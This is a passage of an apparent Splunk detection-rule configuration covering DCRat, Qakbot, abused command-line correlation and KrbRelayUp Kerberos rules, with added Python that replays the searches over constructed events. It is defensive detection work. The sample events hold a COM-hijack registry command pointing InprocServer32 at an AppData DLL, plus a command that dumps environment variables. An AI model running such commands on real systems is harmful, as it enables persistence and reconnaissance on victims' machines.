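                                   "notepad.exe"))
    for i in range(3):
        events.append(ProcessEvent(base + 100 + i * 5, "ws02", "bob", "cmd.exe",
                                   r'cmd.exe /c "C:\Tools\open_notes.bat"',
                                   6000 + i, "notepad.exe", "NOTEPAD.EXE", 7000 + i,
                                   "notepad.exe"))
    return events


if __name__ == "__main__":
    for alert in detect(build_sample_events()):
        print(alert)
```

A burst that straddles a bucket boundary is split across two spans and may fall under the threshold in both; that is a property of fixed-span bucketing in the original search as well, so lower the threshold or widen the span if the payload you are chasing is slower.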
action.notable.param.rule_title = Windows Command Shell DCRat ForkBomb Payload
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.parent_process) as parent_process values(Processes.parent_process_id) as parent_process_id values(Processes.process_id) as process_id dc(Processes.parent_process_id) as parent_process_id_count dc(Processes.process_id) as process_id_count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name= "cmd.exe" (Processes.process_name = "notepad.exe" OR Processes.original_file_name= "notepad.exe") Processes.parent_process = "*.bat*" by Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.parent_process Processes.dest Processes.user _time span=30s | where parent_process_id_count>= 10 AND process_id_count >=10 | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_command_shell_dcrat_forkbomb_payload_filter`

[ESCU - Windows Command Shell Fetch Env Variables - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a suspicious process command line that fetches the environment variables and has a non-shell parent process. This technique was seen in Qakbot malware, which fetches the environment variables of the targeted or compromised host. This TTP detection is a good pivot for possible malicious behavior, since the command line is not launched by a common shell such as cmd.exe or powershell.exe. It can also be a sign that the parent process has had malicious code injected into it to execute this command.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies a suspicious process command line that fetches the environment variables and has a non-shell parent process. This technique was seen in Qakbot malware, which fetches the environment variables of the targeted or compromised host. This TTP detection is a good pivot for possible malicious behavior, since the command line is not launched by a common shell such as cmd.exe or powershell.exe. It can also be a sign that the parent process has had malicious code injected into it to execute this command.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Shell processes that are not excluded by this search may cause false positives; filtering is needed.
action.escu.creation_date = 2022-10-27
action.escu.modification_date = 2022-10-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Command Shell Fetch Env Variables - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Qakbot"]
action.risk = 1
action.risk.param._risk_message = A non-shell parent process spawned child process $process_name$ with command line $process$ to fetch environment variables on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Command Shell Fetch Env Variables - Rule
action.correlationsearch.annotations = {"analytic_story": ["Qakbot"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies a suspicious process command line that fetches the environment variables and has a non-shell parent process. This technique was seen in Qakbot malware, which fetches the environment variables of the targeted or compromised host. This TTP detection is a good pivot for possible malicious behavior, since the command line is not launched by a common shell such as cmd.exe or powershell.exe. It can also be a sign that the parent process has had malicious code injected into it to execute this command.
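Both the "Windows COM Hijacking InprocServer32 Modification" rule earlier in this file and the "Windows Command Shell Fetch Env Variables" rule here are command-line pattern checks with parent-process context, so one added example serves both. The Python below is not Splunk's or the project's code; it runs the two checks over constructed process events. It assumes the `process_reg` macro (not defined in this file) matches a process or original file name of reg.exe, and it deliberately surfaces a caveat in the COM rule: the search matches any reg.exe command line containing InProcServer32, so a `reg query` fires just like a `reg add`, and the reg verb is reported so an analyst can triage it. The CLSID in the samples is a null placeholder, not a real component.

```python
"""Two command-line analytics reimplemented over constructed process events (added example):
reg.exe touching an InProcServer32 key, and "cmd /c set" run by a non-shell parent.
"""
import fnmatch
from dataclasses import dataclass

# Parents excluded by the env-variable analytic (Splunk wildcards, case-insensitive).
SHELL_PARENTS = ("cmd.exe", "powershell*", "pwsh.exe", "explorer.exe")


@dataclass
class ProcessEvent:
    dest: str
    user: str
    parent_process_name: str
    process_name: str
    original_file_name: str
    process: str  # full command line


def is_reg_exe(ev: ProcessEvent) -> bool:
    """Assumed behaviour of the `process_reg` macro: process or original file name is reg.exe."""
    return "reg.exe" in (ev.process_name.lower(), ev.original_file_name.lower())


def com_hijack_inprocserver32(ev: ProcessEvent) -> bool:
    """reg.exe with InProcServer32 anywhere in the command line (any verb, as in the search)."""
    return is_reg_exe(ev) and "inprocserver32" in ev.process.lower()


def reg_verb(ev: ProcessEvent) -> str:
    """First argument after the binary: add, query, delete, ... (for triage, not filtering)."""
    parts = ev.process.split()
    return parts[1].lower() if len(parts) > 1 else ""


def fetch_env_from_non_shell(ev: ProcessEvent) -> bool:
    """Command line ends in 'cmd /c set' or 'cmd.exe /c set' and the parent is not a shell."""
    cmd = ev.process.lower()
    parent = ev.parent_process_name.lower()
    wants_env = cmd.endswith("cmd /c set") or cmd.endswith("cmd.exe /c set")
    from_shell = any(fnmatch.fnmatchcase(parent, pattern) for pattern in SHELL_PARENTS)
    return wants_env and not from_shell


def evaluate(events):
    """Return (rule, detail, dest, command line) for every hit, in event order."""
    hits = []
    for ev in events:
        if com_hijack_inprocserver32(ev):
            hits.append(("com_hijack_inprocserver32", reg_verb(ev), ev.dest, ev.process))
        if fetch_env_from_non_shell(ev):
            hits.append(("fetch_env_non_shell_parent", ev.parent_process_name, ev.dest, ev.process))
    return hits


NULL_CLSID = "{00000000-0000-0000-0000-000000000000}"  # placeholder, not a real component

# Constructed sample events; hosts, users, paths and the CLSID are illustrative only.
SAMPLE_EVENTS = [
    ProcessEvent("ws01", "alice", "cmd.exe", "reg.exe", "reg.exe",
                 r'reg.exe add "HKCU\Software\Classes\CLSID\{}\InprocServer32" /ve /d '
                 r'"C:\Users\alice\AppData\Roaming\update.dll" /f'.format(NULL_CLSID)),
    ProcessEvent("ws01", "alice", "powershell.exe", "reg.exe", "reg.exe",
                 r'reg.exe query "HKCR\CLSID\{}\InprocServer32"'.format(NULL_CLSID)),
    ProcessEvent("ws02", "bob", "excel.exe", "cmd.exe", "Cmd.Exe",
                 r"C:\Windows\System32\cmd.exe /c set"),          # non-shell parent: fires
    ProcessEvent("ws02", "bob", "cmd.exe", "cmd.exe", "Cmd.Exe", "cmd.exe /c set"),
    ProcessEvent("ws03", "carol", "powershell_ise.exe", "cmd.exe", "Cmd.Exe", "cmd /c set"),
    ProcessEvent("ws03", "carol", "svchost.exe", "cmd.exe", "Cmd.Exe",
                 "cmd.exe /c set PATH=%PATH%;C:\\Tools"),          # assigns, does not list
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
```

The fifth sample shows the `powershell*` wildcard absorbing `powershell_ise.exe`, and the sixth shows that the trailing-anchor match (`*cmd /c set`) does not fire on `set NAME=value`, which only assigns a variable.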
action.notable.param.rule_title = Windows Command Shell Fetch Env Variables
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process = "*cmd /c set" OR Processes.process = "*cmd.exe /c set") AND NOT (Processes.parent_process_name = "cmd.exe" OR Processes.parent_process_name = "powershell*" OR Processes.parent_process_name="pwsh.exe" OR Processes.parent_process_name = "explorer.exe") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_command_shell_fetch_env_variables_filter`

[ESCU - Windows Common Abused Cmd Shell Risk Behavior - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following correlation identifies instances where four or more distinct detection analytics are associated with malicious command line behavior that is known to be exploited by multiple threat actors, adversaries, or red teamers on a specific host. By leveraging the Command Line Interface (CLI), attackers can execute malicious commands, gain access to sensitive data, install backdoors, and engage in various nefarious activities. The impact of such compromise can be severe, as attackers may gain unauthorized control over the compromised system, enabling them to exfiltrate valuable information, escalate privileges, or launch further attacks within the network. If this detection is triggered, there is a high level of confidence in the occurrence of suspicious command line activities on the host.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Actions on Objectives", "Installation"], "mitre_attack": ["T1222", "T1049", "T1033", "T1529", "T1016", "T1059"], "nist": ["DE.AE"]}
action.escu.data_models = ["Risk"]
action.escu.eli5 = The following correlation identifies instances where four or more distinct detection analytics are associated with malicious command line behavior that is known to be exploited by multiple threat actors, adversaries, or red teamers on a specific host. By leveraging the Command Line Interface (CLI), attackers can execute malicious commands, gain access to sensitive data, install backdoors, and engage in various nefarious activities. The impact of such compromise can be severe, as attackers may gain unauthorized control over the compromised system, enabling them to exfiltrate valuable information, escalate privileges, or launch further attacks within the network. If this detection is triggered, there is a high level of confidence in the occurrence of suspicious command line activities on the host.
action.escu.how_to_implement = Splunk Enterprise Security is required to utilize this correlation. In addition, modify the source_count value to suit your environment. In our testing, a count of 4 or 5 was reasonable in a lab, but the number may need to be increased based on internal testing. In addition, based on false positives, modify any contributing analytics to be anomalies and lower or raise their risk scores based on organizational importance.
action.escu.known_false_positives = False positives will be present based on many factors. Tune the correlation as needed to reduce excessive triggers.
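The correlation described above does not inspect process telemetry at all; it reads the risk index, keeps only risk events whose `source` matches a fixed wildcard list of command-line analytics, aggregates them per risk object, and alerts when the number of distinct contributing sources reaches `source_count >= 4`. The Python below is an added example, not Splunk's or the project's code, showing that aggregation over constructed risk events: one host that tripped five different analytics, and one that tripped a single in-scope analytic repeatedly plus an out-of-scope one, which must not alert however many events it produces. The analytic names in the sample data are illustrative.

```python
"""Risk-based correlation (added example): distinct contributing detections per risk object."""
import fnmatch
from collections import defaultdict

# The source wildcard list from the correlation search's where-clause.
SOURCE_PATTERNS = (
    "*Cmdline Tool Not Executed In CMD Shell*",
    "*Windows System Network Config Discovery Display DNS*",
    "*Local Account Discovery With Wmic*",
    "*Net Localgroup Discovery*",
    "*Create local admin accounts using net exe*",
    "*Local Account Discovery with Net*",
    "*Icacls Deny Command*",
    "*ICACLS Grant Command*",
    "*Windows Proxy Via Netsh*",
    "*Processes launching netsh*",
    "*Disabling Firewall with Netsh*",
    "*Windows System Network Connections Discovery Netsh*",
    "*Network Connection Discovery With Arp*",
    "*Windows System Discovery Using ldap Nslookup*",
    "*Windows System Shutdown CommandLine*",
)
SOURCE_COUNT_THRESHOLD = 4  # "where source_count >= 4"; tune per how_to_implement


def source_in_scope(source: str) -> bool:
    """Splunk field matching is case-insensitive; fnmatch on lowercased strings mirrors that."""
    s = source.lower()
    return any(fnmatch.fnmatchcase(s, p.lower()) for p in SOURCE_PATTERNS)


def correlate(risk_events, threshold=SOURCE_COUNT_THRESHOLD):
    """risk_events: dicts with _time, risk_object, risk_object_type, source,
    calculated_risk_score, mitre_tactic_id, mitre_technique_id (constructed here)."""
    agg = defaultdict(lambda: {"sources": set(), "tactics": set(), "techniques": set(),
                               "risk_score": 0, "risk_event_count": 0,
                               "firstTime": None, "lastTime": None})
    for ev in risk_events:
        if not source_in_scope(ev["source"]):
            continue
        a = agg[(ev["risk_object"], ev["risk_object_type"])]
        a["sources"].add(ev["source"])
        a["tactics"].add(ev["mitre_tactic_id"])
        a["techniques"].add(ev["mitre_technique_id"])
        a["risk_score"] += ev["calculated_risk_score"]
        a["risk_event_count"] += 1
        t = ev["_time"]
        a["firstTime"] = t if a["firstTime"] is None else min(a["firstTime"], t)
        a["lastTime"] = t if a["lastTime"] is None else max(a["lastTime"], t)
    findings = []
    for (obj, obj_type), a in sorted(agg.items()):
        if len(a["sources"]) >= threshold:  # distinct analytics, not event volume
            findings.append({"risk_object": obj, "risk_object_type": obj_type,
                             "source_count": len(a["sources"]),
                             "risk_score": a["risk_score"],
                             "risk_event_count": a["risk_event_count"],
                             "mitre_tactic_id_count": len(a["tactics"]),
                             "mitre_technique_id_count": len(a["techniques"]),
                             "firstTime": a["firstTime"], "lastTime": a["lastTime"]})
    return findings


def _ev(t, obj, source, score, tactic, technique):
    return {"_time": t, "risk_object": obj, "risk_object_type": "system", "source": source,
            "calculated_risk_score": score, "mitre_tactic_id": tactic,
            "mitre_technique_id": technique}


# Constructed risk index contents: ws01 tripped five in-scope analytics; ws02 tripped one
# in-scope analytic three times plus an out-of-scope analytic.
SAMPLE_RISK_EVENTS = [
    _ev(1000, "ws01", "ESCU - Cmdline Tool Not Executed In CMD Shell - Rule", 25, "TA0002", "T1059"),
    _ev(1010, "ws01", "ESCU - Local Account Discovery With Wmic - Rule", 20, "TA0007", "T1087.001"),
    _ev(1020, "ws01", "ESCU - Net Localgroup Discovery - Rule", 20, "TA0007", "T1069.001"),
    _ev(1030, "ws01", "ESCU - Windows Proxy Via Netsh - Rule", 35, "TA0005", "T1090"),
    _ev(1040, "ws01", "ESCU - Windows System Shutdown CommandLine - Rule", 50, "TA0040", "T1529"),
    _ev(2000, "ws02", "ESCU - Processes launching netsh - Rule", 10, "TA0005", "T1562.004"),
    _ev(2005, "ws02", "ESCU - Processes launching netsh - Rule", 10, "TA0005", "T1562.004"),
    _ev(2010, "ws02", "ESCU - Processes launching netsh - Rule", 10, "TA0005", "T1562.004"),
    _ev(2015, "ws02", "ESCU - Unrelated Analytic - Rule", 60, "TA0003", "T1053.005"),
]

if __name__ == "__main__":
    for finding in correlate(SAMPLE_RISK_EVENTS):
        print(finding)
```

Because the threshold is on distinct sources rather than on summed risk, a single noisy analytic cannot push a host over the line on its own; that is what makes this correlation tolerant of individually low-fidelity contributors.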
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Common Abused Cmd Shell Risk Behavior - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Azorult", "Volt Typhoon", "Sandworm Tools", "Windows Post-Exploitation", "FIN7", "Qakbot", "Netsh Abuse", "DarkCrystal RAT", "Windows Defense Evasion Tactics", "CISA AA23-347A", "Disabling Security Tools"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - RIR - Windows Common Abused Cmd Shell Risk Behavior - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azorult", "Volt Typhoon", "Sandworm Tools", "Windows Post-Exploitation", "FIN7", "Qakbot", "Netsh Abuse", "DarkCrystal RAT", "Windows Defense Evasion Tactics", "CISA AA23-347A", "Disabling Security Tools"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation", "Actions on Objectives", "Installation"], "mitre_attack": ["T1222", "T1049", "T1033", "T1529", "T1016", "T1059"], "nist": ["DE.AE"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following correlation identifies instances where four or more distinct detection analytics are associated with malicious command line behavior that is known to be exploited by multiple threat actors, adversaries, or red teamers on a specific host. By leveraging the Command Line Interface (CLI), attackers can execute malicious commands, gain access to sensitive data, install backdoors, and engage in various nefarious activities. The impact of such compromise can be severe, as attackers may gain unauthorized control over the compromised system, enabling them to exfiltrate valuable information, escalate privileges, or launch further attacks within the network. If this detection is triggered, there is a high level of confidence in the occurrence of suspicious command line activities on the host.
action.notable.param.rule_title = RBA: Windows Common Abused Cmd Shell Risk Behavior
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count, values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count from datamodel=Risk.All_Risk where source IN ("*Cmdline Tool Not Executed In CMD Shell*", "*Windows System Network Config Discovery Display DNS*", "*Local Account Discovery With Wmic*", "*Net Localgroup Discovery*", "*Create local admin accounts using net exe*", "*Local Account Discovery with Net*", "*Icacls Deny Command*", "*ICACLS Grant Command*", "*Windows Proxy Via Netsh*", "*Processes launching netsh*", "*Disabling Firewall with Netsh*", "*Windows System Network Connections Discovery Netsh*", "*Network Connection Discovery With Arp*", "*Windows System Discovery Using ldap Nslookup*", "*Windows System Shutdown CommandLine*") by All_Risk.risk_object All_Risk.risk_object_type All_Risk.annotations.mitre_attack.mitre_tactic | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where source_count >= 4 | `windows_common_abused_cmd_shell_risk_behavior_filter`

[ESCU - Windows Computer Account Created by Computer Account - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a computer account creating a new computer account with a specific Service Principal Name (SPN), "RestrictedKrbHost". The RestrictedKrbHost service class allows client applications to use Kerberos authentication when they do not have the identity of the service but have the server name.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies a computer account creating a new computer account with a specific Service Principal Name (SPN), "RestrictedKrbHost". The RestrictedKrbHost service class allows client applications to use Kerberos authentication when they do not have the identity of the service but have the server name.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows Security Event Logs with EventCode 4741 enabled. The Windows TA is also required.
action.escu.known_false_positives = It is possible that third-party applications have a computer account that adds computer accounts; filtering may be required.
action.escu.creation_date = 2022-04-27
action.escu.modification_date = 2022-04-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Computer Account Created by Computer Account - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Kerberos Attacks", "Local Privilege Escalation With KrbRelayUp"]
action.risk = 1
action.risk.param._risk_message = A Computer Account created a Computer Account on $dest$, possibly indicative of a Kerberos relay attack.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Computer Account Created by Computer Account - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks", "Local Privilege Escalation With KrbRelayUp"], "cis20": ["CIS 10"], "confidence": 60, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies a Computer Account creating a new Computer Account with a specific Service Principal Name - "RestrictedKrbHost". The RestrictedKrbHost service class allows client applications to use Kerberos authentication when they do not have the identity of the service but have the server name.
action.notable.param.rule_title = Windows Computer Account Created by Computer Account
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=4741 user_type=computer Subject_Account_Domain!="NT AUTHORITY" Message=*RestrictedKrbHost* | stats count min(_time) as firstTime max(_time) as lastTime by dest, subject, action ,src_user, user, Account_Name, Subject_Account_Name,Subject_Account_Domain | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_computer_account_created_by_computer_account_filter`

[ESCU - Windows Computer Account Requesting Kerberos Ticket - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a ComputerAccount requesting a Kerberos Ticket. Typically, a user account requests a Kerberos ticket. This behavior was identified with KrbRelayUp, but additional Kerberos attacks have exhibited similar behavior.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies a ComputerAccount requesting a Kerberos Ticket. Typically, a user account requests a Kerberos ticket. This behavior was identified with KrbRelayUp, but additional Kerberos attacks have exhibited similar behavior.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows Security Event Logs with 4768 EventCode enabled. The Windows TA is also required.
action.escu.known_false_positives = It is possible false positives will be present based on third-party applications. Filtering may be needed.
action.escu.creation_date = 2022-04-27
action.escu.modification_date = 2022-04-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Computer Account Requesting Kerberos Ticket - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Kerberos Attacks", "Local Privilege Escalation With KrbRelayUp"]
action.risk = 1
action.risk.param._risk_message = A Computer Account requested a Kerberos ticket on $dest$, possibly indicative of a Kerberos relay attack.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Computer Account Requesting Kerberos Ticket - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks", "Local Privilege Escalation With KrbRelayUp"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies a ComputerAccount requesting a Kerberos Ticket. Typically, a user account requests a Kerberos ticket. This behavior was identified with KrbRelayUp, but additional Kerberos attacks have exhibited similar behavior.
action.notable.param.rule_title = Windows Computer Account Requesting Kerberos Ticket
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=4768 Account_Name="*$" src_ip!="::1" | stats count min(_time) as firstTime max(_time) as lastTime by dest, subject, action, Supplied_Realm_Name, user, Account_Name, src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_computer_account_requesting_kerberos_ticket_filter`

[ESCU - Windows Computer Account With SPN - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies two SPNs, HOST and RestrictedKrbHost, added using the KrbRelayUp behavior. This particular behavior has been found in other Kerberos based attacks.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558"], "nist": ["DE.CM"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = The following analytic identifies two SPNs, HOST and RestrictedKrbHost, added using the KrbRelayUp behavior. This particular behavior has been found in other Kerberos based attacks.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows Security Event Logs with 4741 EventCode enabled. The Windows TA is also required.
action.escu.known_false_positives = It is possible that third-party applications add these SPNs to Computer Accounts; filtering may be needed.
action.escu.creation_date = 2022-04-28
action.escu.modification_date = 2022-04-28
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Computer Account With SPN - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Kerberos Attacks", "Local Privilege Escalation With KrbRelayUp"]
action.risk = 1
action.risk.param._risk_message = A Computer Account was created with SPNs related to Kerberos on $dest$, possibly indicative of a Kerberos relay attack.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Computer Account With SPN - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks", "Local Privilege Escalation With KrbRelayUp"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies two SPNs, HOST and RestrictedKrbHost, added using the KrbRelayUp behavior. This particular behavior has been found in other Kerberos based attacks.
action.notable.param.rule_title = Windows Computer Account With SPN
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=4741 MSADChangedAttributes IN ("*HOST/*","*RestrictedKrbHost/*") AND New_UAC_Value=0x80 | eval Effecting_Account=mvindex(Security_ID,1) | eval New_Computer_Account_Name=mvindex(Security_ID,0) | stats count min(_time) as firstTime max(_time) as lastTime values(EventCode),values(Account_Domain),values(Security_ID), values(Effecting_Account), values(New_Computer_Account_Name),values(SAM_Account_Name),values(DNS_Host_Name),values(MSADChangedAttributes) by dest Logon_ID subject | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_computer_account_with_spn_filter`

[ESCU - Windows ConHost with Headless Argument - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects the unusual use of the Windows Console Host process (conhost.exe) with the undocumented --headless parameter to spawn a new process. This behavior is highly unusual and indicative of suspicious activity, as the --headless parameter is not commonly used in legitimate operations. The analytic identifies this behavior by looking for instances where conhost.exe is invoked with the --headless argument. This behavior is worth identifying for a Security Operations Center (SOC) as it could indicate an attacker's attempt to execute commands or scripts in a stealthy manner, potentially to establish persistence, perform lateral movement, or carry out other malicious activities. If a true positive is identified, it suggests that an attacker has gained a foothold in the environment and is attempting to further their attack, which could lead to serious consequences such as data exfiltration, system compromise, or deployment of ransomware. Potential false positives could arise from legitimate administrative activity, hence it is important to validate the context of the detected behavior during triage.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564.003", "T1564.006"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic detects the unusual use of the Windows Console Host process (conhost.exe) with the undocumented --headless parameter to spawn a new process. This behavior is highly unusual and indicative of suspicious activity, as the --headless parameter is not commonly used in legitimate operations. The analytic identifies this behavior by looking for instances where conhost.exe is invoked with the --headless argument. This behavior is worth identifying for a Security Operations Center (SOC) as it could indicate an attacker's attempt to execute commands or scripts in a stealthy manner, potentially to establish persistence, perform lateral movement, or carry out other malicious activities. If a true positive is identified, it suggests that an attacker has gained a foothold in the environment and is attempting to further their attack, which could lead to serious consequences such as data exfiltration, system compromise, or deployment of ransomware. Potential false positives could arise from legitimate administrative activity, hence it is important to validate the context of the detected behavior during triage.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives may be present if the application is legitimately used; filter by user or endpoint as needed.
action.escu.creation_date = 2023-11-01
action.escu.modification_date = 2023-11-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows ConHost with Headless Argument - Rule
